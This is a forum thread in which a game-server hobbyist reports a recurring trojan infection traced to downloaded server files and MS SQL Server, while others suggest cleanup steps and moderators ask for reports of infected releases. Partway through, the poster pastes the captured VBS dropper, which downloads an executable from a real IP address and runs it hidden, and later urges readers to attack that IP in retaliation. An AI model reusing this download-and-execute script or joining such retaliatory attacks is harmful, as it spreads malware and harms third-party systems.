So i got this trojans

[xlw00tlx]

it keeps trying to acces to my ms sql server 2012(rule 5023 which panda blocks)
then it creates thse files

Panda scan:
Trojan detected VBS/Psyme.C
Location: C:\410.vbs
02/01/2017 23:10 Deleted
Dangerous operation detected Rule 5023 02/01/2017 23:10 Blocked
Trojan detected Unknown name
Location: C:\hexsyno.exe
02/01/2017 23:09 Deleted
Trojan detected VBS/Psyme.C
Location: C:\401.vbs
02/01/2017 23:09 Deleted
Trojan detected Unknown name
Location: C:\Windows\System32\hexsyno.exe


Karpersky scan
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="BAT/TrojanDownloader.Ftp.NOK trojan (cleaned by deleting)" ac=C fn="C:\xpsyno.exe"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="BAT/TrojanDownloader.Ftp.NLV trojan (cleaned by deleting)" ac=C fn="C:\Windows\System32\us.dat"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="BAT/TrojanDownloader.Ftp.NOK trojan (cleaned by deleting)" ac=C fn="C:\Windows\System32\xpsyno.exe"



it deletes but randomly creates them again,ad aware,malwarebytes,esset online and karpersky tools detect and delete them too,but it keeps re apearing so i request backup here
it also tries to fk up my sql server and access to it so i stopped the service

i think i downloaded an infected serverfile but cant remember which ones,mabinogi ones(last i downloaded) seem clean
@Hycker @lastfun @DNC @SanGawku 1 of the mmorpg extra releases is infected but idk which one =/

 

[DNC]

Highly recommend you start scanning each of those Releases.
Not checking them before putting them into the Release section violates the rules of the forum, not to mention uncool for fellow community members whom assume your releases are checked ahead of time (again a rule).



Biesmen CodeDragon SanGawku Shoelace
You 4 ought to be aware of the circumstances. This is a really nasty virus he has and that apparently is in the Releases section now.
Community ought to be alerted so they don't get hijacked.



xlw00tlx

I'd hit up malwarebytes and start going through the standard cleanup process of your box.
Everything that gets a flag ought to have the resources removed from each Release thread, request closing of infected Release threads, and an alert put into the thread(s) for community members sake.
Not my call. But definitely a good suggestion.

Since you caused this, I highly recommend detailing the steps required to clean it up properly and posting it as an edit to any / all affected Release threads.

 

[lastfun]

we were raped? )))
seriously -> check my computer
------------------
xlw00tlx
Give me the infected file
upload somewhere
We will solve our problems ourselves)

You must be registered to see links

 

[xlw00tlx]

@

lastfun ​

next time it replicates i ll make a zip and upload it
DNC malwarebytes on my disk D: (servers one ,1 tb)detected 10 files so far but those arent related i think
i think that everytime i start sql server the trojan replicates,so my sql server is infected
it also creates an user called yuddos.com in win 7 with admin privileges,and that web is a chinese site with ddos attack tool

it also added some stuff to my host file in windir/system32
panda auto kills it so im safe but idk whats the metod of replication i think its the vbs file but panda kills it,there must be another one hidden

 

[NoBrain]

I'd highly suggest formatting your entire system and going again if you're unable to get rid of it. Personally, I'd wipe and go again regardless. The recommendations the others have suggested should help though.

 

[xlw00tlx]

@

NoBrain ​

ll do if it comes back,for now im clean
i ll rescan again using esset and karpesky(2 hours each ) then update if it reapears
i ll show those fking asians to not send me trojans and ddos attack me

 

[DNC]

I wouldn't stop at just scanning the most recent game. I'd be checking all archives, iso's, etc. No clue where you got it from and since you're unsure of when it started, giving advice on which to test aside from just mentioned is kind of a long shot.
Good luck.

 

[Taiga]

I would like to ask you guys to report any threads that contain a virus with "VIRUS", all threads that which potentially contain a virus will be instantly removed.

It's impossible to scan everything, it would be nice if we can get some feedback from the community. It's hard to keep an eye on everything but we are doing our best.

 

[xlw00tlx]

disk c: clean now,disk d where i have the servers have 18 infections so far
all this servers are on extra releases
kabod online infected too
i got this files since like june or august last year,why did it take so long to infect me?are they kinda timed trojans/worms or something?
@lastfun heres 1 of the exes with the dat file i got

You must be registered to see links

virustotal scan:

You must be registered to see links

edit!! got the vbs!!
help me fk this website! hheres where it downloads!
its a fking dude in shangai china, duck YOU CHINA!

Set psp = CreateObject("Msxml2.XMLHTTP")set ws=WScript.CreateObject("WScript.Shell")
psp.Open "GET","http://221.194.44.221:77/syno.exe",0
psp.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(psp.responseBody)
aGet.SaveToFile "c:\syno.exe",2
wscript.sleep 8000
ws.Run "c:\syno.exe",0

EDIT!!!!
the YUDDOS.COM account on windows 7 re appeared after i deleted it
everytime that script executes and the exe runs it creates the damn account

BIG EDIT! FIXED IT I THINK
my sql server was infected,everytime i start the process mssql and sql writer
the infection comes back,so it was a serverfile but again,idk which one.Uninstalling sql server 2012 and im trying to get a clean oneAll ya do me a favor anyway,and attack that ip,take him down,that china a**hole is sending trojans tru that ip:221.194.44.221:77

 

[Biesnis]

@xlw00tlx Do you have any idea from which release thread you got these viruses from? In that case we can remove these threads.

 

[xlw00tlx]

@

Biesmen ​

:dontknow: everything was working normaly 2 day ago then i got infected,something passed tru my comodo firewall and panda antivirus (very well hidden)

i think it was a hidden timed trojan,i removed all with ad aware,malwarebytes and kar-pesky
but something infected my mssql server,now it gives error when unninstalling it and management studio and the native client

the last stuff i downloaded was mabinogi,redownloaded atlantica server,mu online(http://forum.ragezone.com/f197/muservices-season-6-episode-3-a-1055512/) n-age(http://forum.ragezone.com/f857/age-5-0-server-client-1112765/) or rakion (old archives files)